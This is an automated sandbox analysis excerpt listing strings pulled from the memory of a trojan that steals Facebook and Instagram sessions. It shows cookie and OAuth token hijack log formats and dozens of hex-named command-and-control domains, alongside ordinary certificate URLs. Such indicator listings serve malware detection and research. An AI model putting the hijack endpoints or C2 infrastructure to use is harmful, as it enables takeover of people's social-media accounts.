Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/"name="fb_dtsg" value=""logout_hash":"""logout_hash":"logoutToken:""logoutToken:"https://www.facebook.com/comet/try/source=SETTINGS_MENU&nctr[_mod]=pagelet_bluebar&__user=&__a=1&__csr=&__req=14&__beoa=0&__pc=PHASED%3ADEFAULT&dpr=1&__ccg=EXCELLENT&fb_dtsg=&jazoest=for (;;);{https://m.facebook.com/logout.php?h=%s&t=%sc_user=deleted"encrypted":"https://m.facebook.com/?_rdr""name="fb_dtsg" value="logout.phpm_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6\https://m.facebook.com/logout.php%sc_user=deletedhttps://m.facebook.com/?soft=bookmarks"logoutURL":"\"logout.phphttps://m.facebook.com&source=mtouch_logout_button&persist_locale=1&button_name=logout&button_location=settings%s equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/adsmanager/manage/ads equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/comet/try/ equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2 equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2&access_token=&expires_in=Location: query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: token = %s equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesLocation: equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesocation: equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1 equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1x-auth-result: query_mess_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: x_auth_result = %s equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1 equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri= equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri=origin: https://www.instagram.comsec-fetch-mode: corsreferer: https://www.instagram.com/sec-fetch-site: cross-sitefb-ar: equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/ equals www.facebook.com (Facebook)
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	String found in binary or memory: qSOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio{83da6326-97a6-4088-9453-a1923f573b29},3{1da5d803-d492-4edd-8c23-e0c0ffee7f0e},3{1da5d803-d492-4edd-8c23-e0c0ffee7f0e},6{e4870e26-3cc5-4cd2-ba46-ca0a9a70ed04},0{f19f064d-082c-4e27-bc73-6882a1bb8e4c},0FRCFLCBRBLLFFCFRFLIsWow64ProcessKernel32.dllArial-inf db%0.1f db%0.1f %%%i bits%i Hz%i-Input Levelsb1024:b512:b256:b128:Init:Pull loss:Push loss:Buffers:StatisticsOutputres:sr:ch:Input%i smpMax Latency:Internal SR:%i.%i.%i.%iDriver Version:VB-Audio Virtual CableDriver Name:SYSTEM\CurrentControlSet\Services\VB-CableSOFTWARE\VB-Audio\CableVBAudioCableWDM_SRVBAudioCableWDMhttp://www.vb-audio.comhttp://www.facebook.com/pages/VB-Audio-Software/396002733802606The change will take effect on next launch... equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20191224.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20200229.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)

Source: unknown

DNS traffic detected: queries for: 9ed2feea30c3cc5d.com

Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://55BE681FC6760236.com/
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://55BE681FC6760236.com/RI
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.435213084.0000000002E68000.00000004.00000001.sdmp	String found in binary or memory: http://55BE681FC6760236.com/info_old/ddd
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.368367614.00000000006C1000.00000004.00000020.sdmp	String found in binary or memory: http://55BE681FC6760236.com/info_old/w/wk
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354220251.000000000074A000.00000004.00000020.sdmp	String found in binary or memory: http://55BE681FC6760236.com/info_old/w:
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.340514679.000000000077D000.00000004.00000001.sdmp	String found in binary or memory: http://55be681fc6760236.com/
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://61D53B5A4BC1AB86.com/
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://61D53B5A4BC1AB86.com/AR
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.435775291.0000000002E68000.00000004.00000001.sdmp	String found in binary or memory: http://61D53B5A4BC1AB86.com/info_old/ddd
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.435775291.0000000002E68000.00000004.00000001.sdmp	String found in binary or memory: http://61D53B5A4BC1AB86.com/info_old/dddmX
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354220251.000000000074A000.00000004.00000020.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.368367614.00000000006C1000.00000004.00000020.sdmp	String found in binary or memory: http://61D53B5A4BC1AB86.com/info_old/w
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354369289.000000000077D000.00000004.00000020.sdmp	String found in binary or memory: http://61D53B5A4BC1AB86.com/o/
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.368375423.00000000006C8000.00000004.00000020.sdmp	String found in binary or memory: http://61d1a802ff4a46b5.com/
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://84B5A35D6E5335EF.com/
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://84B5A35D6E5335EF.com/2
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://84B5A35D6E5335EF.com/_1D
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.433202764.0000000002E68000.00000004.00000001.sdmp	String found in binary or memory: http://84B5A35D6E5335EF.com/info_old/ddd
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354220251.000000000074A000.00000004.00000020.sdmp	String found in binary or memory: http://84B5A35D6E5335EF.com/info_old/w
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354369289.000000000077D000.00000004.00000020.sdmp	String found in binary or memory: http://84B5A35D6E5335EF.com/vx6
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.368404745.00000000006E2000.00000004.00000020.sdmp	String found in binary or memory: http://84b347c728b2d94d.com/
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.368384019.00000000006D1000.00000004.00000020.sdmp	String found in binary or memory: http://84b5a35d6e5335ef.com/info_old/w
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.340480997.0000000000790000.00000004.00000001.sdmp	String found in binary or memory: http://84b5a35d6e5335ef.com/info_old/wc
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://9ED2FEEA30C3CC5D.com/
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://9ED2FEEA30C3CC5D.com//U
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.431133751.0000000002E68000.00000004.00000001.sdmp	String found in binary or memory: http://9ED2FEEA30C3CC5D.com/info_old/ddd
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.431133751.0000000002E68000.00000004.00000001.sdmp	String found in binary or memory: http://9ED2FEEA30C3CC5D.com/info_old/dddio
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.368367614.00000000006C1000.00000004.00000020.sdmp	String found in binary or memory: http://9ED2FEEA30C3CC5D.com/info_old/w)$
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354369289.000000000077D000.00000004.00000020.sdmp	String found in binary or memory: http://9ED2FEEA30C3CC5D.com/o/
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354220251.000000000074A000.00000004.00000020.sdmp	String found in binary or memory: http://9ed2feea30c3cc5d.com//fine/send
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.340514679.000000000077D000.00000004.00000001.sdmp	String found in binary or memory: http://9ed2feea30c3cc5d.com/info_old/w
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.340514679.000000000077D000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://BDC347C728B2D94D.com/
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.340514679.000000000077D000.00000004.00000001.sdmp	String found in binary or memory: http://BDC347C728B2D94D.com//n7
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://BDC347C728B2D94D.com/g
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.435775291.0000000002E68000.00000004.00000001.sdmp	String found in binary or memory: http://BDC347C728B2D94D.com/info_old/ddd
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354220251.000000000074A000.00000004.00000020.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.368367614.00000000006C1000.00000004.00000020.sdmp	String found in binary or memory: http://BDC347C728B2D94D.com/info_old/w
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://BDC347C728B2D94D.com/l
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354369289.000000000077D000.00000004.00000020.sdmp	String found in binary or memory: http://BDC347C728B2D94D.com/ll
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://BDC347C728B2D94D.com/o/
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354369289.000000000077D000.00000004.00000020.sdmp	String found in binary or memory: http://BDC347C728B2D94D.com/o/S6
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://C431A802FF4A46B5.com/
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://C431A802FF4A46B5.com/in
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.432211570.0000000002E68000.00000004.00000001.sdmp	String found in binary or memory: http://C431A802FF4A46B5.com/info_old/ddd
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354220251.000000000074A000.00000004.00000020.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.368367614.00000000006C1000.00000004.00000020.sdmp	String found in binary or memory: http://C431A802FF4A46B5.com/info_old/w
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.347655574.0000000000790000.00000004.00000001.sdmp	String found in binary or memory: http://C431A802FF4A46B5.com/info_old/wx
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.340514679.000000000077D000.00000004.00000001.sdmp	String found in binary or memory: http://C431A802FF4A46B5.com/ll
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://C431A802FF4A46B5.com/o/
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354369289.000000000077D000.00000004.00000020.sdmp, SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.340514679.000000000077D000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://back19e64ea00d6ecfe1.io/
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://back19e64ea00d6ecfe1.io/N
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://back19e64ea00d6ecfe1.io/b
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354369289.000000000077D000.00000004.00000020.sdmp	String found in binary or memory: http://back19e64ea00d6ecfe1.io/e7
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.435775291.0000000002E68000.00000004.00000001.sdmp	String found in binary or memory: http://back19e64ea00d6ecfe1.io/info_old/ddd
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354220251.000000000074A000.00000004.00000020.sdmp, 26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://back19e64ea00d6ecfe1.io/info_old/w
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.368367614.00000000006C1000.00000004.00000020.sdmp	String found in binary or memory: http://back19e64ea00d6ecfe1.io/info_old/w$%
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.340514679.000000000077D000.00000004.00000001.sdmp	String found in binary or memory: http://back19e64ea00d6ecfe1.io/info_old/w.
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.418434135.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: http://back19e64ea00d6ecfe1.io/s
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.340514679.000000000077D000.00000004.00000001.sdmp	String found in binary or memory: http://bdc347c728b2d94d.com/
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354369289.000000000077D000.00000004.00000020.sdmp	String found in binary or memory: http://bdc347c728b2d94d.com/X
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.340514679.000000000077D000.00000004.00000001.sdmp	String found in binary or memory: http://bdc347c728b2d94d.com/u
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.368428478.00000000006F5000.00000004.00000020.sdmp	String found in binary or memory: http://bdck19e64ea00d6ecfe1.io/
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.340381653.00000000007B4000.00000004.00000001.sdmp	String found in binary or memory: http://bdcsvchost.exe
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.340514679.000000000077D000.00000004.00000001.sdmp	String found in binary or memory: http://c431a802ff4a46b5.com/info_old/w
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.340514679.000000000077D000.00000004.00000001.sdmp	String found in binary or memory: http://c431a802ff4a46b5.com/info_old/w#
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354369289.000000000077D000.00000004.00000020.sdmp	String found in binary or memory: http://c431a802ff4a46b5.com/o/
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354348509.0000000000772000.00000004.00000020.sdmp	String found in binary or memory: http://c43347c728b2d94d.com/
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt0
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354726295.0000000002135000.00000004.00000040.sdmp	String found in binary or memory: http://charlesproxy.com/ssl
Source: 26FF190E7AE0F7C7.exe, 26FF190E7AE0F7C7.exe, 00000007.00000003.364737158.0000000003F1C000.00000004.00000001.sdmp	String found in binary or memory: http://clients2.google.com/service/update2/crx
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364818535.0000000003F25000.00000004.00000001.sdmp	String found in binary or memory: http://clients2.google.com/service/update2/crxE
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: http://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=true
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg
Source: 1618258522437.exe.6.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: 1618258522437.exe.6.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: 1618258522437.exe.6.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: http://crl3.digicert.com/sha2-ev-server-g2.crl04
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: http://crl4.digicert.com/sha2-ev-server-g2.crl0K
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: http://docs.google.com/
